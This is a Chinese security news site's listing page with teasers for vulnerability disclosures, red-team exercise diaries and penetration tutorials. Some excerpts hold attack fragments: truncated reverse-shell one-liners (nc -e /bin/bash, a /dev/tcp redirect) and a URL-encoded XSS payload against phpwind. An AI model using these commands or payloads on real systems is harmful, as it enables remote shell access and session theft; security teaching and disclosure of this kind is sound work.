h - 第 4 | CN-SEC 中文网

安全漏洞

宏电 H8922 多个漏洞公开 (CVE-2021-28149 ~ 28151)

一：漏洞描述🐑宏电 H8922 后台存在管理员信息泄露漏洞，攻击者使用任意账号登录后访问特殊的Url即可获取所有用户的账号和密码宏电 H8922 后台中的网络测试模块中存在命令执行漏洞。通过命令拼接执...

04月29日368 views评论

阅读全文

安全新闻

每日攻防资讯简报[Apr.20th]

0x00漏洞1.OverlayFS中的一个漏洞允许Ubuntu下的本地用户获得root特权(CVE-2021-3493)https://ssd-disclosure.com/ssd-advisory-...

04月20日102 views评论

阅读全文

安全文章

HTTPS双向认证

作者：上海派拉软件基础研发部-左健HTTP：超文本传输协议（HyperText Transfer Protocol）是互联网上应用最为广泛的一种网络协议，是一个客户端和服务器端请...

04月17日49 views评论

阅读全文

安全文章

内网渗透——反弹shell详解

声明：文章技术仅供网络安全技术人员及白帽子使用，任何个人或组织不可用于违法犯罪，一经发现直接上报国家安全机关处理。

04月17日54 views评论

阅读全文

安全闲碎

2021护网日记（七）-4/13 HW漫漫，看好革命的本钱

4月13日，天气：晴，大风，夜班。今天心情略微有些沉重，听说有兄弟在这次HVV的过程中倒下了，希望这不是真的。夜班凌晨5点多实在太困了，趴在桌上睡着了，还做梦了，梦中我收了很多0day。划重点▶一切正...

04月13日50 views评论

阅读全文

安全闲碎

2021护网日记（七）-4/13 HW漫漫，看好革命的本钱

04月13日51 views评论

阅读全文

安全闲碎

2021护网日记（五）-4/11 今天的HW报告怎么写？

4月11日，天气：忙着干活，忘了。正式护网第四天，经过前三天的磨合和调整，误报明显稍多了，攻击也少多了，开始头疼HW日报了。轻松一下，吃一下今天的瓜一、红队钓鱼，因涉乱伦，扣除1000分，当面道歉，“...

04月11日135 views评论

阅读全文

安全闲碎

2021HVV段子-夜班值守加点“料”

红蓝紫的口号：2021护网，你要的段子都在这里！护网“正餐”已经进入第二天，“筒子们”夜班值守太辛苦，来点“料”本文目录:一、“韩毅”依然高烧不退，多平台蔓延，本人发声“我要接广告”二、2021护网《...

04月09日434 views评论

阅读全文

星光贴吧 1.3 后台拿 Shell

星光贴吧 1.3 后台拿SHEL by:风之传说今天分析了两个程序，都发了吧。。好吧，我承认有点鸡肋。。我们先来看看这个文件 Common/common.function.php： functi...

04月03日lcx38 views评论

阅读全文

浅析php后门木马 - 技术文章

浅析php后门木马作者:alibaba 首发:t00ls.net , 转载请注明t00ls php后门木马对大家来说一点都不陌生吧，但是它的种类您又知多少呢？本文为您浅析说明一些php后门木马常...

04月03日lcx57 views评论

阅读全文

lcx

phpwind xss 漏洞

http://forum.xxxxx.com.cn/message.php?type=post&username=%253c%2573%2563%2572%2569%2570%2574%253...

04月03日37 views评论

阅读全文

linux 五种反弹SHELL

1. nc -e /bin/bash 2. mknod backpipe p; nc 0backpipe 3. /bin/bash -i > /dev/tcp// 0&1 4. mkno...

04月03日lcx35 views评论

阅读全文

宏电 H8922 多个漏洞公开 (CVE-2021-28149 ~ 28151)

每日攻防资讯简报[Apr.20th]

HTTPS双向认证

内网渗透——反弹shell详解

2021护网日记（七）-4/13 HW漫漫，看好革命的本钱

2021护网日记（七）-4/13 HW漫漫，看好革命的本钱

2021护网日记（五）-4/11 今天的HW报告怎么写？

2021HVV段子-夜班值守加点“料”

星光贴吧 1.3 后台拿 Shell

浅析php后门木马 - 技术文章

phpwind xss 漏洞

linux 五种反弹SHELL

在线咨询

微信